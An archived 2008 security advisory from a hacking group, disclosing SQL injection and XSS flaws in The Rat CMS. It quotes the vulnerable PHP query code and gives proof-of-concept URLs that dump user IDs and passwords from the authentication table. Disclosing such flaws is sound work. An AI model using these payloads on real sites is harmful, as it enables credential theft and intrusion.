The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

2008-06-26T00:00:00
ID SECURITYVULNS:DOC:20087
Type securityvulns
Reporter Securityvulns
Modified 2008-06-26T00:00:00

Description

========================================================== The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities ==========================================================

,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, ____| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\( / XXXXXX /
/ XXXXXX / (
_(
`------'

AUTHOR : CWH Underground DATE : 25 June 2008 SITE : cwh.citec.us

APPLICATION : The Rat CMS VERSION : Pre-Alpha 2 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms

--- Remote SQL Injection ---


Vulnerable File [viewarticle.php?id=]

@Line 5

73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id']; 74: $result = mysql_query($query) or die('Error : ' . mysql_error()); 75: $row = mysql_fetch_array($result, MYSQL_ASSOC);


Exploit

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection] [+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]


POC Exploit

http://192.168.24.25/trcms/viewarticle.php?id=-9999//UNION//SELECT//user_id,user_password//FROM//tbl_auth_user-- http://192.168.24.25/trcms/viewarticle2.php?id=-9999//UNION//SELECT//user_id,user_password//FROM//tbl_auth_user--

--- Remote XSS ---


Exploit

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS> [+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS> [+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos